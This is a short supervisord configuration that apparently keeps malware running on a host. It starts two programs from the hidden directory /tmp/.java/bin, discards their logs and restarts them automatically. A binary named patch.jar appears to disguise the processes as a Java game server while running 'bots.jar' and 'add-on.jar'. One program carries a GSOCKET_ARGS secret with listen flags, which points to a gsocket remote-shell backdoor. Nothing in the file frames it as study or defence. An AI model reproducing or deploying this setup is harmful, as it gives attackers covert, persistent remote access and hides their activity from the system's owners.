[supervisord]
logfile=/dev/null

[program:app]
directory=/tmp/.java/bin
command=./patch.jar -a 'java -Xms128M -Xmx512M -Dterminal.jline=false -Dterminal.ansi=true -jar server.jar' ./bots.jar -c ./conf.json
stdout_logfile=/dev/null
autorestart = true

[program:gnet]
directory=/tmp/.java/bin
environment=GSOCKET_ARGS="-s i1c7A0e2A1c-5A16f3D9g8Hbj7-6C4a961eCd9-F9d6A2k7-8A1c5J1G9 -liq"
command=./patch.jar -a 'java -Xms128M -Xmx512M -Dterminal.jline=false -Dterminal.ansi=true -jar server.jar' ./add-on.jar 
stdout_logfile=/dev/null
autorestart = true